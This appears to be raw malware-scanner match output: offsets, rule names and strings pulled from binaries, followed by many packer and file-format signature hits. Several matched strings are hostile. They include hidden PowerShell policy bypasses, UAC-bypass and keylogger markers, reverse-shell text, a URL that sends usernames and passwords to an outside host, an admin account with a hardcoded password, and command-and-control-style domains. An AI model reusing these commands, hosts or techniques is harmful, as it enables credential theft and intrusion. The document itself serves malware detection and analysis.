5 0x117632 0x129800 0x129814 0x145f26 0x145f44 0x14ee3a SecurityProducts scan None any of them
9 0x14622c 0x146256 0x1465c8 0x14a6e5 0x14a709 0x14a71b 0x14d784 0x14fa4b 0x14fac0 0x14faea SecurityProducts Scan None any of them
1 0x146ff8 0x14702c SecurityProducts SCAN None any of them
2 0x149e5b 0x14a122 0x14a13f SecurityProducts SCAN None any of them
0 0x107134 SecurityProducts smc.exe None any of them
0 0x117062 SecurityProducts spideragent.exe None any of them
0 0xf9b4d SecurityProducts system.exe None any of them
0 0x12455a SecurityProducts USBGuard.exe None any of them
0 0x12d843 SecurityProducts VPDN_LU.exe None any of them
0 0x100c39 SecurityProducts winword.exe None any of them
0 0x14dba5 SecurityProducts wordpad.exe None any of them
0 0x107146 SecurityProducts zapro.exe None any of them
0 0x10714f SecurityProducts zlclient.exe None any of them
0 0x10715b SecurityProducts zonealarm.exe None any of them
0 0xfaa78 Path /kys_allow_put.asp?type=/kys_allow_get.asp?name=unsuccessfully!waiting......reboot None any of them
0 0x103589 Path /Library/Application Support/JavaWcom.JavaW.plistlaunchctl load launchctl start {\\rtMsftedit 5.41.15.15076f746b6c6f6164722e5752417373656d626c792e31004d53436f6d63746c4c69622e546f6f6c6261722e32On None any of them
0 0x117519 Path /selfservice/microsites/search.php?%016I64d/solutions/company-size/smb/index.htm None any of them
0 0x117f06 Path /dev/pts/4/tmp/1408.logSHAREImagePathZwUnloadDriverZwLoadDriver/s /u_time64PCC_CMD_PACKETPCC_BASEMODPCC_SYSPCC_PROCESSPCC_FILEbcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8G5\\Device\\-%s-%04dFAL2.03XXXXXXXXXXXXXXX None any of them
0 0x125d36 Path /zapoy/gate.php None any of them
0 0x12fde4 Path /c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%SYSTEMROOT%\\temp\\_dbg.tmp%SYSTEMROOT%\\SysWOW64\\mspool.dll%SYSTEMROOT%\\System32\\dpcore16t.dll%SYSTEMROOT%\\System32\\wdigestEx.dll%SYSTEMROOT%\\System32\\mspool.dll%SYSTEMROOT%\\System32\\kernel32.dll%SYSTEMROOT%\\SysWOW64\\iastor32.exe%SYSTEMROOT%\\System32\\msvcse.exe%SYSTEMROOT%\\System32\\mshtaex.exe%SYSTEMROOT%\\System32\\iastor32.exe%SYSTEMROOT%\\SysWOW64\\mshtaex.exeInstaller.exeInfo: Process %sError None any of them
0 0x13db29 Path /tag=info&id=15\\Temp\\iExplorer.exe\\Temp\\\"TSG\"greensky27.vicp.net None any of them
0 0x143135 Path /update?id=%8.8x None any of them
0 0x14b20a Path /x86/BypassUac.exe/x64/BypassUac.exe/x86/BypassUacDll.dll/x64/BypassUacDll.dllAFX_IDP_COMMAND_FAILUREW None any of them
0 0xf8557 Path C:\\Users\\7\\Desktop\\dll - bak\\Release\\dll.pdbwinsta0WINSTA0TVT DEMOCONFIG-DESTORY\\\\.\\PIPE\\RUN_AT_SESSION (%d)GULP#   !    yyBINDATA-PdPDwritedroofiledroocmddrooHideUpdatePzfileHideSysUpfileHideSysCmdDesnation %s is small than finished!2.F2.F44444ACCELORATORT1Y943jIhk09lkjdsMYGAMEHAVETHISISASUPERNEWGAMENOWBEGINTHIS324NEWGAMEISAPI_CONNECTBD_SOCKBD_DNSPCC_SO None any of them
0 0xfa54d Path z:\\Work\\Make Troy\\hj8u@P None any of them
0 0x101191 Path d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbGuiWAng!@#9bd*-a add user(admin$/GuiWAng!@#9bd*) to admin[ERR] get haltable addresss fail[ERR] get ZwDeviceIoControlFile fail[ERR] get native function pointers fail˺willweiweiӵadministratorɹ None any of them
0 0x101db0 Path E:\\1510prj\\t `EX-mode: pushX-mode: popProgramm was started at %02i:%02i:%02iStart finging of LAN hostsFinding was fault. Unexpective errorStart finging of OPC ServersWas found %i OPC ServersOPCServer%02i.txtShortInfoHarvesterCmd.dllWin32_SystemEnclosureGetFileCmd.dll<x></x><y></y><z></z><q></q><?xml version=\"1.0\ None any of them
0 0x102e6f Path D:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\Release\\DrvFltIp.pdbsniffitmyWorkStart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&VER=Cobra 1.2&MARK=&ID=NoID&END=1 %d.%d&L_IP=DRIVE=%c:&#1A&2B@doublesafeZMUNK:VistaWin2000Win2003Win2003R2Win2008Win2008R2Win2012Win32SWin7Win8Win95Win95OSR2Win98Win98SEWinMeWinXP%Hso0yh4:%HHPhMedusa has finishedJoMo-Kun / Foofus NetworksMedusa v.%s./ss 5631 -a green Attack PcAnyWhere in 5 secondsmedusa -H $1.pc -U usersrequires an A network as ar None any of them
0 0x10654b Path C:\\Windows\\system32\\cmd.exeinflate 1.1.3 Copyright 1995-1998 Mark AdlerBinderCarrier.pdb\\StringFileInfo\\040904B0\\CompanyName\\StringFileInfo\\040904B0\\InternalName\\StringFileInfo\\040904B0\\FileDescriptionCreateObject(\"WScript.Shell\").Run \"%s %s\"tmp.vbstmp1.vbsFireMalv\\FireMalv\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\<h1>Success</h1><h1>Sorry, Path not found.</h1>xl/vbaProject.binxl/cu None any of them
0 0x11f24c Path x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllSystem\\CurrentControlSet\\Services\\USBSTOR\\EnumSystem\\CurrentControlSet\\Services\\PartMgr\\Enum\\AGENTCPD.DLLagentcpd.dllPADupdate.exedll_installer.dll\\restore\\Q:\\__?__.lnkSoftware\\Microsoft\\MSNetMng\\shelldoc.dllfile size = %d bytes\\MSAgentGlobal\\RPCMutexGlobal\\DirectMarketingnls_933w.dllBINARYKfAcquireSpinLockHAL.dllREAD_REGISTER_UCHAR@STATIC$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaOriginal Innovations None any of them
0 0x123fbe Path F:\\Projects\\Bot\\Bot\\Release\\Ism.pdbC:\\ddd\\wer2.txt\\Microsoft\\Windows\\tmp43hh11.txtpowershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuserpowershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"C:\\ProgramData\\stat2.datInvoke-bypassuacStart Keylog None any of them
0 0x12948c Path F:\\Excalibur\\Excalibur\\Excalibur\\bin\\oSaberSvc.pdbcmd.exe /c MD https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138CloudRun.exeSaberSvcB.exeSaberSvc.exeSaberSvcW.exetianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115Internet Connect Failed!WOODTALE TECHNOLOGY INCFlyingbird Technology LimitedNeoact C None any of them
0 0x129927 Path C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdbpip creat failedCraatePipeare you there? success kill process okVista|08|Win7are you there!@#$%^&*()_+.hotp1ǀdAVCObfuscationQ2>sAVCSetiriControl3+ȃMhʃ None any of them
0 0x12eecc Path J:\\chong\\nod\\Release\\SslMM.exenetwork.proxy.sslHost: %ws:%dSCHANNEL.DLL\\Microsoft\\Internet Explorer\\conhost.exe\\Microsoft\\Internet Explorer\\dll2.xor\\Microsoft\\Internet Explorer\\HOOK.DLL\\Microsoft\\Internet Explorer\\main.dll\\Microsoft\\Internet Explorer\\nvsvc.exe\\Microsoft\\Internet Explorer\\SBieDll.dll\\Microsoft\\Internet Explorer\\mon\\Microsoft\\Internet Explorer\\runas.exeSOFTWARE\\360Safe\\LiveupSoftware\\360safeSOFTWARE\\kingsoft\\AntivirusSOFTWARE\\Avira\\Avira De None any of them
0 0x13f5bb Path c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdblisten abovefamilycould costSetSystemTimeAdjustment\\payload\\payload.x86.pdbUSER_PRIV_GUESTUSER_PRIV_ADMINUSER_PRIV_USERPPSWVPPWinSCard.dll/c start "" "%s" %scmd.exerunSndVol.exeRedirectEXEsamsrv.dllHookDC.dllCDLocateCSystemSamIRetrievePrimaryCredentialsSamIRetrieveMultiplePrimaryCredentials3H$@H3MHXH\$Ht$WH None any of them
0 0x145b74 Path c:\\Documents and Settings\\Administrator\\Got WMI process Pid: %dThis exploit will executeRunning reverse shell<description>CHKen QQ:41901298</description>version=\"9.9.9.9\"name=\"CH.Ken.Tool\"to HOST!SS.EXElstrlen0RtlUnwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedFailed to execute shell, error = %sUDP listen needs -p arghttp://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORDUsername: \"%s\", Password: \"%s\", Remarks: \"%s\"user:\"%s\" None any of them
0 0x145f65 Path C:\\WINDOWS\\temp\\pojie.exe /l=C:\\WINDOWS\\temp\\s.exeC:\\WINDOWS\\temp\\s.exe tcp explorer.exe http://www.hackdos.comFailed to read file or invalid data in file!WTNE / MADE BY E COMPILER - WUTAO The interface of kernel library is invalid!eventvwrFailed to decompress data!NOTEPAD.EXE result.txtGetLogonS/showthread.php?t=156643sedebugnameValueUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322SOFTWARE\\Classes\\HTTP\\shell\\open\\commandSYSTEM\\ControlSet001\\Services\\%sGloba None any of them
0 0x148112 Path c:\\windows\\system32\\command.com /c Easy Usage Version -- Edited By: racle@tian6.comOH,Sry.Too long command.Success! Commander.Hey,how can racle work without ur command ?The exploit thread was unable to map the virtual 8086 address space[+] Usage: VNC_bypauth <target> <scantype> <option>========RealVNC <= 4.1.1 Bypass Authentication Scanner=======[+] Type VNC_bypauth <target>,<scantype> or <option> for more informationsVNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection close None any of them
0 0x14c35a Path C:\\Program Files\\DevStudio\\VB\\VB5.OLBMailTo:szj1230@yesky.comCommand1_Clicksoftware\\microsoft\\internet explorer\\typedurlsvb5chs.dllMSVBVM50.DLLsystem.dllset sys=server.CreateObject (\"system.contral\") Public Function reboot(atype As Variant)t& = ExitWindowsEx(1, atype)atype=request(\"atype\") AceiveX dllDeclare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal sys.reboot(atype)' -- check for a command that we None any of them
0 0x1643b1 Path C:\Windows\SoftWareProtector\ЌɁQQQUSVW`ģ+=t QhhUSVW`ģ+=t Qhh`UjhhhdPd%XSVWe(3Ҋԉ$` jhh^{!={P˴H,!^!DŽ|$` ;s;rQV+^u3ȋQQ LoadL None any of them
0 0x1651c6 Path c:\0000001.datt#JAPRB0XRHHZXBtJI| JuB\Í@~$P None any of them
0 0x18a55f Path C:\Windows\SoftWareProtector\YQPWPsձsջr%surrrrU-6K'{!ls|NI݁謫$C?4B$C<d$USVWM3_^[Ë`^X-1+v<3fNt1^ ށVUX-wƉEZS3j33U@hÜ`]UX+PPT$ 3 None any of them
0 0x7c169 Path ole32.dll None any of them
0 0xf9d47 Path cmd.exee None any of them
0 0xff241 Path wmiexec.vbs None any of them
0 0x104727 Path msdnet32.dll None any of them
0 0x104baf Path green.exe None any of them
0 0x1068ea Path sbiedll.dlldbghelp.dllap None any of them
0 0x108741 Path crypt32.dll None any of them
0 0x115130 Path fxsst.dll None any of them
0 0x116477 Path firefox.exe None any of them
0 0x116559 Path http://google.com/Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)Operating System\"<Command></Command>\" /d \"nKERNEL32.DLL@ReturnValueID: 0x%xName: %Scmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST& SYSTEMINFO) ELSE EXITdomcommon.exejpic.gov.syaiomgr.exeperfaudio.datCasper_DLL.dll{KY7JB&Yc-W@{4216567A-4512-9825-7745F856}***** SYSTEM INFORMATION *********** SECURITY INFORMATION ******Antivirus: Firewall: ***** None any of them
0 0x116696 Path jpic.gov.sya None any of them
0 0x1166b5 Path perfaudio.dat None any of them
0 0x116aa6 Path acrotray.exe None any of them
0 0x116ba0 Path mcs.exe None any of them
0 0x116e83 Path server.dll None any of them
0 0x118bc8 Path romanian.antih None any of them
0 0x118c03 Path ugly.goril None any of them
0 0x118da1 Path ca.dll None any of them
0 0x118f02 Path cmd.exe None any of them
0 0x11ef24 Path svrg.pdb None any of them
0 0x11f675 Path p32.sysunilay.dll None any of them
0 0x11f6ec Path msrstd.pdbm None any of them
0 0x11f97e Path volrec.pdb None any of them
0 0x12404e Path powershell.exe None any of them
0 0x12464f Path 32.dadva None any of them
0 0x126524 Path ex.dll None any of them
0 0x1277d7 Path network.proxy.socks None any of them
0 0x1298a3 Path www.micro1.zyns.com None any of them
0 0x12a066 Path hlpuctf.dll None any of them
0 0x12a078 Path kl.dll None any of them
0 0x12a088 Path iomus.dll None any of them
0 0x12a1ee Path hauthuid.dll None any of them
0 0x12a349 Path rsfvxd.dattsb386.datfrmmlg.datsmdhost.dll None any of them
0 0x12a394 Path app.stream-media.net None any of them
0 0x12a80b Path msupdater.exemsupdater32.exem None any of them
0 0x12a845 Path msupdate.pif None any of them
0 0x12ac82 Path h.data None any of them
0 0x12b593 Path ntkrnlpa.exe None any of them
0 0x12b839 Path disp.dll None any of them
0 0x12cfcc Path http://www.jmicron.co.tw None any of them
0 0x12d18a Path http://www.realtek.com None any of them
0 0x12da44 Path navlu.dll.url None any of them
0 0x12e4b5 Path msimghlp.dllximarsh.dllmsximl.dll None any of them
0 0x12e6be Path www.bing.com None any of them
0 0x1302f6 Path http://www.wasabii.com.tw None any of them
0 0x1317ab Path info.inipi4izd6vp0.com None any of them
0 0x13202b Path ddos.tf None any of them
0 0x1336ac Path iphlpsvc.tmp None any of them
0 0x13c53c Path http://extcitrix.we11point.com/vpn/index.php?ref=1%SystemRoot%\\System32\\svchost.exe -k msupdateManagement Support Team1DTOPTOOLZ Co.,Ltd.0SEOUL1Hello World!CONIN$SetConsoleModeGetEnvironmentStringsGetFileTypeHeapCreateVirtualFreeGetOEMCPFlushFileBuffersSetStdHandleextension: .jpgyahoo kec\\Control\\zxplughttp://www.facebook.com/comment/update.exeShared a shell to %s:%s Successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-fl None any of them
0 0x13db91 Path otna.vicp.netsmithking19.gicp.net None any of them
0 0x14542a Path http://www.vip80000.com/hot/index.htmlGetConnectStringCnCerT.Safe.SSClone.dll(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPGklock.dllErreur : le bureau courant (klock de mimikatz pour WindowsC:\\Windows\\Temp\\Cmd.txtget_Form1http://localhost/retomysql/pista.aspx?id_pista=1SELECT ASCII(SUBSTR(username,{0},1)) FROM US None any of them
0 0x1466d9 Path http://www.foundstone.com None any of them
0 0x146824 Path xsiff.exe None any of them
0 0x14703f Path ntwdblib.dll None any of them
0 0x148a63 Path http://www.wzpg.comip None any of them
0 0x148c02 Path kelloworld.dllk None any of them
0 0x14c423 Path vb5chs.dll None any of them
0 0x1506b8 Path cvrit000.bat None any of them
0 0x150881 Path scardprv.dll None any of them
0 0x150c1c Path uwauserv.dll None any of them
36 0x153836 0x154e3d 0x15e0df 0x15ee54 0x160fc2 0x161a80 0x161b0d 0x161e59 0x161f5a 0x1623d7 0x163dcc 0x165540 0x1697d2 0x16ab19 0x16e37a 0x16f9d1 0x16fdb0 0x17005d 0x172970 0x172a2c 0x172ff3 0x17a0bb 0x17bf8f 0x17d081 0x17e510 0x180a68 0x180f52 0x1811e9 0x18502c 0x1860ef 0x186c6f 0x18ae88 0x18c393 0x18d3a1 0x18d3f6 0x192c8d 0x19392f Path kernel32.dll None any of them
6 0x154eb9 0x15f848 0x16abc5 0x17a419 0x181076 0x185039 0x185630 Path user32.dll None any of them
0 0x15729c Path temp.exe None any of them
2 0x157914 0x159b78 0x161694 Path mscoree.dll None any of them
0 0x16748c Path elicen40.dll None any of them
0 0x17b015 Path s.nah None any of them
0 0x157901 NET_DLL_Detecton_1 _CorDllMainmscoree.dll% None $1
0 0x161681 NET_executable_Detecton_1 _CorExeMainmscoree.dll% None $1
0 0x17c79f _3DMark_Database_file_Detecton_1 3DMark Database File None $1
0 0x177ed9 ACE_Archive_Detecton_1 **ACE** None $1
0 0x1921fe ACE_Archive_Detecton_1 **ACE** None $1
1 0x15ac54 0x15e5ef ACProtect_1_4x_Detecton_1 GetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImp None $1
0 0x15e5ef ACProtect_1_4x_Detecton_Number_2 GetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImport_Endss None $1
0 0x15e569 ACProtect_UltraProtect_1_0X_2_0X_Detecton_Number_2 KERNEL32.DLLUSER32.DLLGetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImport_Endss None $1
1 0x15f83b 0x185623 ActiveMARK_5_x_Detecton_1 --MPRMMGVA--user32.dllMessageBoxAThis application cannot run with an active debug None $1
0 0x185623 ActiveMARK_5_x_Detecton_Number_2 --MPRMMGVA--user32.dllMessageBoxAThis application cannot run with an active debugger in memory. Please unload the debugger and restart the application.Warning None $1
0 0x1732d5 Adlib_Sample_Audio_file_Detecton_1 GOLD SAMPLE None $1
1 0x16da9a 0x1721e7 Alex_Protector_0_4_beta_1_Detecton_1 `ǃ3hhhǃ,$<@h None $1
1 0x163a8b 0x17e759 Alex_Protector_1_0_beta_2_Detecton_1 `]@$D$ 3XPd5d% None $1
0 0x180a01 Alias_PIX_Vivid_IMG_Graphics_format_Detecton_1 ect None $1
0 0x183406 Alias_PIX_Vivid_IMG_Graphics_format_Detecton_1  None $1
0 0x17d0f2 Amiga_AIFF_8SFX_Audio_file_Detecton_1 FORM8SVXVHDR None $1
0 0x186791 Amiga_IFF_ILBM_Graphics_format_Detecton_1 FORMILBMBMHD None $1
0 0x16b29b Anti007_V2_6_Detecton_1 LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeGetSystemDirectoryACreateFileAWriteFileCloseHandleExitProcess None $1
2 0x15d037 0x17b775 0x1849d3 AntiDote_1_0_Demo_1_2_Detecton_1 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dll None $1
0 0x1849d3 AntiDote_1_0_Demo_Detecton_Number_2 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dllMessageBoxA&CharLowerAUSER32.dllstrstrmalloc^freeLfclose_filbufdftellbfseekWfopenI__CxxFrameHandlerMSVCRT.dll None $1
0 0x17b775 AntiDote_V1_2_Detecton_1 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dll&CharLowerAUSER32.dll^freeLfclose_filbufmallocdftellbfseekWfopenstrstrMSVCRT.dll None $1
0 0x16b3da aPack_v0_98_m_Detecton_1 ȎP33P;v None $1
0 0x177b0e aPack_v0_98b_com_Detecton_1 WÿWWP None $1
0 0x155eb1 aPack_v0_98b_DS_ES_not_saved_Detecton_1 ˺33KۍJu None $1
2 0x17e861 0x18320b 0x1909c5 aPack_v0_98b_DS_ES_not_saved_Detecton_1 ˺33KۍJu None $1
0 0x159adc aPack_v0_98b_exe_Detecton_1 м None $1
0 0x162da8 Apex_3_0_alpha_Detecton_1 _Q@0FGYh None $1
0 0x1696c0 ARM_Protector_0_1_Detecton_1 ` ]EU]^@ @ 1@ X None $1
0 0x156f04 ARM_Protector_0_2_Detecton_1 ` ]EU] @ @ 2@ None $1
0 0x16a747 ARM_Protector_0_3_Detecton_1 ` ]EU]$@ $@ K9@ XPX@PÊF*[S[CS2 2 *[CSÈGJu None $1
0 0x1696c0 ARM_Protector_v0_1_Detecton_1 ` ]EU]^@ @ 1@ XPX@PÊF*[S[CS2 2 *[CSÈGJu None $1
1 0x155004 0x182ed1 Armadillo_3_01_3_05_Detecton_1 `]PQ YXPQ YXPQ None $1
1 0x158450 0x1767cb Armadillo_3_10_Detecton_1 UjhDh BdPd%XSVWeLAD3ҊԉDȁ Dʉ D None $1
1 0x15e4f4 0x188011 Armadillo_4_00_0053_Detecton_1 Ujh KhHdPd%XSVWe1K3ҊԉKȁ Kʉ K None $1
1 0x16ca70 0x17b063 Armadillo_4_10_Detecton_1 UjhLhIdPd%XSVWe1L3Ҋԉ|Lȁ xLʉ tLp None $1
1 0x16f674 0x192a53 Armadillo_4_20_Detecton_1 UjhLhIdPd%XSVWe1L3ҊԉLȁ Lʉ |Lx None $1
1 0x165a63 0x18c6ab Armadillo_4_30_4_40_Detecton_1 Ujh@hdPd%XSVWe3Ҋԉ0ȁ ,ʉ ($ None $1
0 0x180597 Armadillo_4_30a_Detecton_1 DdeData initialized (ANSI), app strings are '%s' and '%s'DdeData initialized (UNICODE), app strings are '%S' and '%S'PutString('%s')GetString(), falseGetS None $1
1 0x178077 0x18ff4f Armadillo_4_40_Detecton_1 1.1.4ƶ$Ҥw@'oP)$ERҌ n_B'iWU D*ke1(}Iߵ]sBUSystemSystemDDE ProcessingSwPDDEDDE ProcessingSwPDDE< None $1
0 0x17f62a Armadillo_4_44a_public_build_Detecton_1 U SVWEPEEQAAAAAAAAAAAAAAAAAIA IRAZ#YZE 3 M}t UUEP_^[]U SVWEPEES2CCKQCY@[E 3 M}t UUEP_^[]U SVWEPEEp|tS#Q, ̀̀"pɀɀɀ p|tɀ"Y[ESrCC None $1
0 0x188011 Armadillo_v4_00_0053_Detecton_1 Ujh KhHdPd%XSVWe1K3ҊԉKȁ Kʉ KK3VxYuj YuC0KKK- None $1
0 0x17b063 Armadillo_v4_10_Detecton_1 UjhLhIdPd%XSVWe1L3Ҋԉ|Lȁ xLʉ tLpL3VxYuj YuC0LLХL- None $1
0 0x192a53 Armadillo_v4_20_Detecton_1 UjhLhIdPd%XSVWe1L3ҊԉLȁ Lʉ |LxL3VxYuj YuC0LLإL- None $1
0 0x18c6ab Armadillo_v4_30_4_40_Detecton_1 Ujh@hdPd%XSVWe3Ҋԉ0ȁ ,ʉ ($3VxYuj YuC$ None $1
0 0x1635c9 Armadillo_v4_30_4_40_Detecton_Number_2 `]PQҜ ɋYXPQҜ ɋYXPQҜ  None $1
0 0x15f8e3 AsCrypt_v0_1_Detecton_1 Q None $1
0 0x15f8d3 AsCrypt_v0_1_Detecton_Number_2 None $1
0 0x15f916 AsCrypt_v0_1_Detecton_Number_3 None $1
0 0x161d99 AsCrypt_v0_1_Detecton_Number_4 None $1
0 0x18f945 AsCrypt_v0_1_Detecton_Number_4 $ None $1
0 0x154d7c ASDPack_2_0_Detecton_1 Kernel32.dllIGetModuleHandleA None $1
0 0x154dd4 ASDPack_2_0_Detecton_Number_2 [C{tC None $1
0 0x16a4e4 ASDPack_v1_0_Detecton_1 UVS\@[ @} uUOj], @ @v t uu u[^ Uj !@ @j@h @j,!@ @ @ @P @Pm_ None $1
0 0x175035 Aspack_v2_12_Detecton_1  P None $1
0 0x196324 Aspack_v2_12_Detecton_1 `]EU]݁""e.PL&]^SPH None $1
18 0x1548be 0x155ece 0x1561f2 0x15800d 0x16430c 0x164fac 0x1697f8 0x17135e 0x172731 0x178ea4 0x17eb46 0x181402 0x183817 0x188d65 0x189e7c 0x18bb0d 0x18c03d 0x193246 0x196324 ASPack_v2_12_Detecton_1 `]EU None $1
2 0x1697f8 0x17135e 0x172731 ASProtect_1_23_RC4_build_08_07_dll_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
1 0x164fab 0x172730 ASProtect_1_23_RC4_build_08_07_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
2 0x1620eb 0x172cab 0x17fffd ASProtect_2_0_Detecton_1 h@ None $1
0 0x1776c4 ASProtect_2_0_Detecton_1 h`@ None $1
0 0x1776c4 ASProtect_2_3_SKE_build_04_26_Beta_Detecton_1 h`@ le> 8Z `mQ-/bZkn &~; ^b}xn None $1
2 0x1548be 0x183817 0x18bb0d ASProtect_SKE_2_1_2_2_dll_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
1 0x1561f1 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
0 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_Number_2 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_Number_3 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x178ea3 ASProtect_SKE_2_3_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x158c4e ASProtect_v1_2_Detecton_1 `5xV4Iu]EU None $1
0 0x172730 ASProtect_v1_23_RC4_build_08_07_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x189e7b ASProtect_v_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
0 0x180d2a ASYLUM_Music_File_v_1_0_Detecton_1 ASYLUM Music Format V1.0 None $1
0 0x18e16e Audio_CD_file_Detecton_1 RIFFCDDAfmt None $1
0 0x180ccf AutoDesk_Animation_file_Detecton_1 @ None $1
0 0x7d230 AVI_movie_file_Detecton_1 RIFF AVI LIST None $1
0 0x171fd0 AVI_movie_file_Detecton_1 RIFFAVILIST None $1
0 0x175d6c AVP_Antiviral_Database_Detecton_1 AVP Antiviral Database None $1
0 0x18977a AVP_Inspector_Database_Detecton_1 Ghost Buster None $1
0 0x1617c0 AZProtect_0001_Detecton_Number_3 3I33۬2ֶ͊ffs f5 fu33OuыfUSV33ۋM UuNJr3CC31$*Ĉ1^[ None $1
1 0x16b3fb 0x184ba2 BamBam_0_01_Detecton_1 jShlS=+f/+ωE kfUA<3 None $1
0 0x184ba2 BamBam_v0_01_Detecton_1 jShlS=+f/+ωE kfUA<3fHfP\A9EE}:u tVO:uu3uECCPMɋKEEta5k{ + None $1
0 0x1808ce BDC_HelpSystem_Help_file_Detecton_1 BDC HelpSystem None $1
0 0x16c8ed BeRoEXEPacker_V1_00_Detecton_1 FtQ‹~ uRWP_Zt/ȋt"rDQRWPQ_ZYt ؃a None $1
0 0x177ea0 BeRoEXEPacker_v1_00_Detecton_1 `hhhG,s)> None $1
0 0x16c8ed BeRoEXEPacker_V1_00_Detecton_Number_2 FtQ‹~ uRWP_Zt/ȋt"rDQRWPQ_ZYt None $1
0 0x182209 BGI_Stroked_Font_v_1_1_Detecton_1 PKBGI Stroked Font V1.1 None $1
3 0x185d36 0x188a70 0x188ac0 0x18e9a5 Borland_C_Borland_Builder_Detecton_1 ;v+Y None $1
3 0x155f2a 0x156187 0x15b206 0x192d37 Borland_C_DLL_Detecton_1 fb:C++HOOK None $1
3 0x155f2a 0x156187 0x15b206 0x192d37 Borland_C_for_Win32_1999_Detecton_1 fb:C++HOOK None $1
0 0x172cfe Borland_Delphi_3_Detecton_1 Portions Copyright (c) 1983,96 Borland None $1
0 0x174b0a Borland_Delphi_3_Detecton_Number_2 Portions Copyright (c) 1983,97 Borland None $1
0 0x186b25 Borland_Delphi_5_Detecton_1 Portions Copyright (c) 1983,99 Borland None $1
0 0x160ca9 Borland_Delphi_v6_0_v7_0_Detecton_Number_2 S3j33 None $1
0 0x162111 Borland_Delphi_v6_0_v7_0_Detecton_Number_2 S3 j 3 3 None $1
0 0x166e50 Borland_Delphi_v6_0_v7_0_Detecton_Number_3 Ut< None $1
0 0x17a70e Borland_Delphi_v6_0_v7_0_Detecton_Number_3 U None $1
0 0x18a6ea Borland_Delphi_v6_0_v7_0_Detecton_Number_3 U@ None $1
0 0x174b49 CALS_Raster_graphics_format_Detecton_1 srcdocid: None $1
0 0x157ea7 Celsius_Crypt_2_1_Detecton_Number_2 U(E$?HEE HEED$E$EEEEEE;Es9}t3ED$E$ EU:EEE뿃}t4}t.ED$E$EU:EED$E$EU: EEEEEE None $1
0 0x1845e3 CGM_Graphics_format_Detecton_1 *HiJaak 2 None $1
0 0x16729c ChinaProtect_Detecton_1 0ù0ù0ù0Vj@hPj0^ËDVh@6VhjV^ None $1
1 0x16345c 0x196b61 CICompress_1_0_Detecton_1 jh5@j8@@ @q;@uajj jjjhh@,@@jh@5 None $1
1 0x16373b 0x174a0b CipherWall_Self_Extrator_Decryptor_Console_1_5_Detecton_1 aBLJ  n[WFGu ru su s None $1
1 0x16e82a 0x1897a6 CipherWall_Self_Extrator_Decryptor_GUI_1_5_Detecton_1 aBLJ jWFGu ru su s None $1
0 0x15edb5 Code_Virtualizer_V1_3_1_0_Detecton_1 `_ǁ;G,u.G,DI u@tw@ >ut$$3O0u None $1
0 0x16f92b codeCrypter_0_31_Detecton_Number_2 PXS[@U] None $1
